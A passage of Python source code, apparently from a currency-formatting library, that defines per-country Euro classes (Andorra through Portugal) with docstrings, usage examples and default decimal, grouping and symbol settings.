amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2.
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to '\u00A0' (no-break space).
symbol_ahead (bool, optional): True if the symbol goes ahead of
the value, False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroAD':
"""Class creator.
Returns:
EuroAD: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='AD€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroAT(Currency):
"""EuroAT currency representation.
Simple usage example:
>>> from multicurrency import EuroAT
>>> euroat = EuroAT(
... amount=123456.789)
>>> print(euroat)
€ 123.456,79
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2.
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to '\u00A0' (no-break space).
symbol_ahead (bool, optional): True if the symbol goes ahead of
the value, False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroAT':
"""Class creator.
Returns:
EuroAT: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='AT€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroBE(Currency):
"""EuroBE currency representation.
Simple usage example:
>>> from multicurrency import EuroBE
>>> eurobe = EuroBE(
... amount=123456.789)
>>> print(eurobe)
€ 123.456,79
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2.
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to '\u00A0' (no-break space).
symbol_ahead (bool, optional): True if the symbol goes ahead of
the value, False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroBE':
"""Class creator.
Returns:
EuroBE: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='BE€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroCY(Currency):
"""EuroCY currency representation.
Simple usage example:
>>> from multicurrency import EuroCY
>>> eurocy = EuroCY(
... amount=123456.789)
>>> print(eurocy)
123.456,79 €
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2.
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to '\u00A0' (no-break space).
symbol_ahead (bool, optional): True if the symbol goes ahead of
the value, False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroCY':
"""Class creator.
Returns:
EuroCY: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='CY€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroEE(Currency):
"""EuroEE currency representation.
Simple usage example:
>>> from multicurrency import EuroEE
>>> euroee = EuroEE(
... amount=123456.789)
>>> print(euroee)
123 456,79 €
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2.
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to
'\u202F' (narrow no-break space).
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to '\u00A0' (no-break space).
symbol_ahead (bool, optional): True if the symbol goes ahead of
the value, False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u202F',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroEE':
"""Class creator.
Returns:
EuroEE: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='EE€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroFI(Currency):
"""EuroFI currency representation.
Simple usage example:
>>> from multicurrency import EuroFI
>>> eurofi = EuroFI(
... amount=123456.789)
>>> print(eurofi)
123 456,79 €
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2.
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to
'\u202F' (narrow no-break space).
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to '\u00A0' (no-break space).
symbol_ahead (bool, optional): True if the symbol goes ahead of
the value, False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u202F',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroFI':
"""Class creator.
Returns:
EuroFI: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='FI€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroFR(Currency):
"""EuroFR currency representation.
Simple usage example:
>>> from multicurrency import EuroFR
>>> eurofr = EuroFR(
... amount=123456.789)
>>> print(eurofr)
123 456,79 €
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2.
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to
'\u202F' (narrow no-break space).
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to '\u00A0' (no-break space).
symbol_ahead (bool, optional): True if the symbol goes ahead of
the value, False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u202F',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroFR':
"""Class creator.
Returns:
EuroFR: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='FR€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroDE(Currency):
"""EuroDE currency representation.
Simple usage example:
>>> from multicurrency import EuroDE
>>> eurode = EuroDE(
... amount=123456.789)
>>> print(eurode)
123.456,79 €
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2.
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to '\u00A0' (no-break space).
symbol_ahead (bool, optional): True if the symbol goes ahead of
the value, False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroDE':
"""Class creator.
Returns:
EuroDE: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='DE€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroGR(Currency):
"""EuroGR currency representation.
Simple usage example:
>>> from multicurrency import EuroGR
>>> eurogr = EuroGR(
... amount=123456.789)
>>> print(eurogr)
123.456,79 €
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2.
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to '\u00A0' (no-break space).
symbol_ahead (bool, optional): True if the symbol goes ahead of
the value, False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroGR':
"""Class creator.
Returns:
EuroGR: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='GR€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroIE(Currency):
"""EuroIE currency representation.
Simple usage example:
>>> from multicurrency import EuroIE
>>> euroie = EuroIE(
... amount=123456.789)
>>> print(euroie)
€123,456.79
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2.
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to '' (no separator).
symbol_ahead (bool, optional): True if the symbol goes ahead of
the value, False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'EuroIE':
"""Class creator.
Returns:
EuroIE: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='IR€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroIT(Currency):
"""EuroIT currency representation.
Simple usage example:
>>> from multicurrency import EuroIT
>>> euroit = EuroIT(
... amount=123456.789)
>>> print(euroit)
123.456,79 €
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2.
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to '\u00A0' (no-break space).
symbol_ahead (bool, optional): True if the symbol goes ahead of
the value, False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroIT':
"""Class creator.
Returns:
EuroIT: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='IT€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroXK(Currency):
"""EuroXK currency representation.
Simple usage example:
>>> from multicurrency import EuroXK
>>> euroxk = EuroXK(
... amount=123456.789)
>>> print(euroxk)
123 456,79 €
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2.
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to
'\u202F' (narrow no-break space).
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to '\u00A0' (no-break space).
symbol_ahead (bool, optional): True if the symbol goes ahead of
the value, False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u202F',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroXK':
"""Class creator.
Returns:
EuroXK: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='XK€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroLV(Currency):
"""EuroLV currency representation.
Simple usage example:
>>> from multicurrency import EuroLV
>>> eurolv = EuroLV(
... amount=123456.789)
>>> print(eurolv)
123 456,79 €
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2.
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to
'\u202F' (narrow no-break space).
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to '\u00A0' (no-break space).
symbol_ahead (bool, optional): True if the symbol goes ahead of
the value, False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u202F',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroLV':
"""Class creator.
Returns:
EuroLV: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='LV€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroLT(Currency):
"""EuroLT currency representation.
Simple usage example:
>>> from multicurrency import EuroLT
>>> eurolt = EuroLT(
... amount=123456.789)
>>> print(eurolt)
123 456,79 €
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2.
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to
'\u202F' (narrow no-break space).
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to '\u00A0' (no-break space).
symbol_ahead (bool, optional): True if the symbol goes ahead of
the value, False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u202F',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroLT':
"""Class creator.
Returns:
EuroLT: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='LT€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroLU(Currency):
"""EuroLU currency representation.
Simple usage example:
>>> from multicurrency import EuroLU
>>> eurolu = EuroLU(
... amount=123456.789)
>>> print(eurolu)
123.456,79 €
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2.
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to '\u00A0' (no-break space).
symbol_ahead (bool, optional): True if the symbol goes ahead of
the value, False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroLU':
"""Class creator.
Returns:
EuroLU: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='LU€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroMT(Currency):
"""EuroMT currency representation.
Simple usage example:
>>> from multicurrency import EuroMT
>>> euromt = EuroMT(
... amount=123456.789)
>>> print(euromt)
€123,456.79
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2.
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to '' (no separator).
symbol_ahead (bool, optional): True if the symbol goes ahead of
the value, False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'EuroMT':
"""Class creator.
Returns:
EuroMT: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='MT€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroMC(Currency):
"""EuroMC currency representation.
Simple usage example:
>>> from multicurrency import EuroMC
>>> euromc = EuroMC(
... amount=123456.789)
>>> print(euromc)
123 456,79 €
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2.
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to
'\u202F' (narrow no-break space).
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to '\u00A0' (no-break space).
symbol_ahead (bool, optional): True if the symbol goes ahead of
the value, False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u202F',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroMC':
"""Class creator.
Returns:
EuroMC: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='MC€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroME(Currency):
"""EuroME currency representation.
Simple usage example:
>>> from multicurrency import EuroME
>>> eurome = EuroME(
... amount=123456.789)
>>> print(eurome)
123.456,79 €
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2.
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroME':
"""Class creator.
Returns:
EuroME: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='ME€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroNL(Currency):
"""EuroNL currency representation.
Simple usage example:
>>> from multicurrency import EuroNL
>>> euronl = EuroNL(
... amount=123456.789)
>>> print(euronl)
€ 123.456,79
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2.
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroNL':
"""Class creator.
Returns:
EuroNL: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='NL€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroPT(Currency):
"""EuroPT currency representation.
Simple usage example:
>>> from multicurrency import EuroPT
>>> europt = EuroPT(
... amount=123456.789)
>>> print(europt)
€ 123.456,79
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2.
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
